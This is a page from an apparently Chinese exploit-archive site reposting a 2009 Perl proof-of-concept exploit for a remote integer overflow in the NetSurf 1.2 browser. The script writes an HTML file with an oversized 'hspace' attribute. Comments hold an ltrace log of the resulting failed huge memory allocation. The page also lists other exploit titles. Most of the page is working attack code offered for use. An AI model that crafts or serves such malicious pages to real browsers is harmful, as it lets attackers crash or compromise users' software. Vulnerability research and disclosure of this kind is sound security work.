首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NetSurf version 1.2 hspace remote integer overflow proof of concept exploit
来源:http://jbrownsec.blogspot.com/ 作者:Brown 发布时间:2009-01-15  
#!/usr/bin/perl
# netsurf_hspace_intof1.pl
# Netsurf 1.2 'hspace' Remote Integer Overflow PoC Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# 
# [ltrace log -- hspace = 30000, without --sync]
# 
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)
#                                                         = 0x8cbda01
# cairo_reset_clip(0xb6600948, 0x80c4500, 0, 0, 0)
#                                                         = 0
# cairo_rectangle(0xb6600948, 0, 0, 0, 0)
#                                                         = 0
# cairo_clip(0xb6600948, 0, 0, 0, 0)
#                                                         = 0xb6600aec
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)
#                                                         = 0x8cbda01
# gdk_pixbuf_get_from_drawable(0, 0x8d0ed78, 0, 0, 0 <unfinished ...>
# malloc(3073536192) /// HUGE MALLOC
#                                                         = NULL
# <... gdk_pixbuf_get_from_drawable resumed> )
#                                                         = 0
# gdk_pixbuf_scale(0, 0x8c0e238, 0, 0, 100 <unfinished ...>
# free(0xb6600dc8)
#                                                         = <void>
# free(0xb6600de0)
#                                                         = <void>
# 
# Adv Ref: netsurf_multiple_adv.txt

$filename = $ARGV[0];
if(!defined($filename))
{

     print "Usage: $0 <filename.html>\n";

}

$head = "<html>" . "\n";
$trig = "<applet code=\"test.class\" hspace=\"32767\">" . "\n";
#$trig = "<img src=\"test.jpg\" hspace=\"32767\">" . "\n";
$foot = "</html>";

$data = $head . $trig . $foot;

     open(FILE, '>' . $filename);
     print FILE $data;
     close(FILE);

exit;

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NetSurf version 1.2 width remo
·The Cisco IOS HTTP server is v
·NetSurf version 1.2 remote mem
·NetSurf Web Browser 1.2 Multip
·Oracle TimesTen Remote Format
·Oracle Secure Backup 10g exec_
·Joomla com_Eventing 1.6.x Blin
·phosheezy 2.0 Remote Command E
·Ciansoft PDFBuilderX 2.2 Activ
·AAA EasyGrid ActiveX 3.51 Rem
·Blue Eye CMS <= 1.0.0 (clanek)
·Exploits 3CTftpSvc Server 2.0.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved